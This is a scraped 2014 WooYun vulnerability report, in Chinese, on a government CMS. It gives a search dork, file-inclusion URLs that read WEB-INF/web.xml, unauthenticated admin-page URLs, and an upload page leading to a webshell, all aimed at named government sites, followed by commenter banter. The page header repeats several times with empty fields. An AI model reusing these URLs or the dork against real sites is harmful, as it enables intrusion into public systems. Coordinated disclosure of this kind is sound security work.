某通用型政府cms任意文件上传漏洞/文件包含/未授权访问

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054821

漏洞标题：某通用型政府cms任意文件上传漏洞/文件包含/未授权访问

漏洞作者： Coody

提交时间：2014-03-28 15:57

修复时间：2014-05-12 15:58

公开时间：2014-05-12 15:58

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-28：细节已通知厂商并且等待厂商处理中
2014-04-01：厂商已经确认，细节仅向厂商公开
2014-04-11：细节向核心白帽子及相关领域专家公开
2014-04-21：细节向普通白帽子公开
2014-05-01：细节向实习白帽子公开
2014-05-12：细节向公众公开

简要描述：

0.0

详细说明：

关键字 inurl:website/deptwebsite/Content.jsp?filePath=/

0x00:文件包含漏洞（通用型）
说明：测试中，直接访问web.xml是不可访问的，通过该漏洞可成功读取内容。
测试url：Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
漏洞证明：
http://www.nxbb.gov.cn/website/deptwebsite/0566/Content.jsp?issueId=38603&msgType=00&filePath=//WEB-INF/web.xml
http://www.dayawan.gov.cn/website/deptwebsite/0109/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
http://www.gdnx.gov.cn/website/deptwebsite/0477/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml

0x01:未授权访问（通用型）
漏洞证明：
http://www.gdnx.gov.cn/portal/admin/video/AddVideo.jsp
http://www.dayawan.gov.cn/portal/admin/offdocsearch/addItem.jsp
http://www.dayawan.gov.cn/portal/admin/video/AddVideo.jsp
很多页面，不再举例……

0x02:文件上传导致任意代码执行（部分通用）
说明：测试中未发现明确的版本信息，通过测试，某一类版本的存在任意文件上传导致直接getshell的漏洞。
漏洞证明：
http://59.39.89.120/portal/admin/gazette/InsertFile.jsp 
http://market.heyuan.gov.cn/ portal/admin/gazette/InsertFile.jsp
成功上传后，可通过查看源码查找文件目录。



http://59.39.89.120//website/datum/gazette/wooyun.jsp

漏洞证明：

继续关注该套cms

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2014-04-01 22:29

厂商回复：

漏洞评价：

2014-03-28 16:13 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫，我笑世人看不穿~)

你关注的SB Coody 发表了漏洞某通用型政府cms任意文件上传漏洞/文件包含/未授权访问
2014-03-28 16:19 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

@疯子 ……
2014-03-28 16:39 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

买了个包连续三个
2014-03-28 17:13 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云，知恩不忘，其实我一直都在乌云默...)

为什么你越来越厉害了！求收下~
2014-03-28 17:17 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

@U神你又在卖萌……
2014-03-28 18:02 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云，知恩不忘，其实我一直都在乌云默...)

@Coody 这么屌~求教我如何挖漏洞！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054821

漏洞标题：某通用型政府cms任意文件上传漏洞/文件包含/未授权访问

相关厂商：Cncert

漏洞作者： Coody

提交时间：2014-03-28 15:57

修复时间：2014-05-12 15:58

公开时间：2014-05-12 15:58

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054821

漏洞标题：某通用型政府cms任意文件上传漏洞/文件包含/未授权访问

相关厂商：Cncert

漏洞作者： Coody

提交时间：2014-03-28 15:57

修复时间：2014-05-12 15:58

公开时间：2014-05-12 15:58

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-054821"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：